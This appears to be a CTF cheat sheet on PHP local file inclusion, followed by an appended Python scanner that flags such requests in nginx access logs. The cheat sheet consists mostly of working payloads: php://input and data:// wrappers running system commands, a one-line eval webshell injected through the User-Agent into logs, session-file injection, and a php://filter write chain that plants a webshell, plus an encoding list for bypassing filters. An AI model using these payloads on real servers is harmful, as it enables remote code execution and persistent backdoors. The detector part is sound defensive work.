Viewing via command execution

    ?file=php://input

(including the Php bypass [uppercase])

Capture the request and pass the parameter via POST.

Or use data to view it:

    ?file=data://text/plain,<?=system("ls /")?>
Log injection

The location of the log file is known:

    ?file=/var/log/nginx/access.log

Capture the request and change the User-Agent to a one-line webshell:

    <?php @eval($_REQUEST[1])?>
Injection via session files

Servers usually store session files in:

    /var/lib/php/
    /var/lib/php/sessions/
    /tmp/
    /tmp/sessions/
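Pass the parameter via POST directly to 3.php in the web root.
(Currently, destroying the session, deleting the tmp folder, filtering <, and setting the include path are all viable.)

    <?php system("cd var/www/html;tac fl0g.php");

(anything similar will do)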
Viewing directly with the data pseudo-protocol

    ?file=data://text/plain;base64,PD89c3lzdGVtKCd0YWMgZioucGhwJyk7

(base64-encoded)
Writing a one-line webshell with the php pseudo-protocol

    ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=3.php

    contents=<?php @eval($_POST[jz]);?>

    <?php
    // Swap each byte pair (UCS-2LE -> UCS-2BE); the write filter above swaps them back
    $result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[jz]);?>');
    echo "payload:".$result."\n";
    ?>
filter pseudo-protocol

    ?filter=php://filter/convert.base64-encode/resource=flag.php
    ?filename=php://filter/convert.iconv.utf-8.UTF-16/resource=./flag.php
Options when base64 is filtered (brute-force with Burp Suite's cluster bomb attack)
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
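
A defender-side check for the request shapes listed in these notes, as an added example that is not part of the original page: it scans nginx combined-format access-log lines for stream wrappers or log/session paths in query parameters and for PHP open tags in the User-Agent. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# nginx "combined" format: "METHOD target PROTO" status bytes "referer" "user-agent"
LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>.*)"$')
# Case-insensitive on purpose: PHP resolves Php:// the same as php://
WRAPPER = re.compile(r'^(?:php|data)://', re.I)
# Log and session locations named in the notes; client-controlled text lands there
WRITABLE = re.compile(r'(?:^|/)(?:var/log|var/lib/php|tmp)/')
PHP_TAG = re.compile(r'<\?')

def findings(line):
    """Return the sorted rule names (hypothetical labels) that one log line triggers."""
    m = LINE.search(line)
    if not m:
        return ["unparsed"]
    hits = set()
    # parse_qsl percent-decodes each value, so encoded wrappers are still matched
    for _name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = value.strip()
        if WRAPPER.match(value):
            hits.add("stream-wrapper-in-parameter")
        if WRITABLE.search(value):
            hits.add("log-or-session-path-in-parameter")
        if PHP_TAG.search(value):
            hits.add("php-tag-in-parameter")
    if PHP_TAG.search(m["ua"]):
        hits.add("php-tag-in-user-agent")
    return sorted(hits)

def scan(lines):
    """Map line index -> findings, keeping only lines that triggered a rule."""
    return {i: f for i, line in enumerate(lines) if (f := findings(line))}

PREFIX = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLES = [  # constructed log lines, not taken from a real server
    PREFIX + '"GET /index.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    PREFIX + '"POST /index.php?file=Php://input HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    PREFIX + '"GET /index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CQUJD HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    PREFIX + '"GET / HTTP/1.1" 200 64 "-" "<?php echo 1; ?>"',
    PREFIX + '"GET /index.php?file=/var/log/nginx/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLES).items():
        print(idx, hits)
```

A path match alone only says a parameter points at a log or session location; pairing it with an earlier PHP-tag hit from the same client is what indicates the log-injection sequence described above.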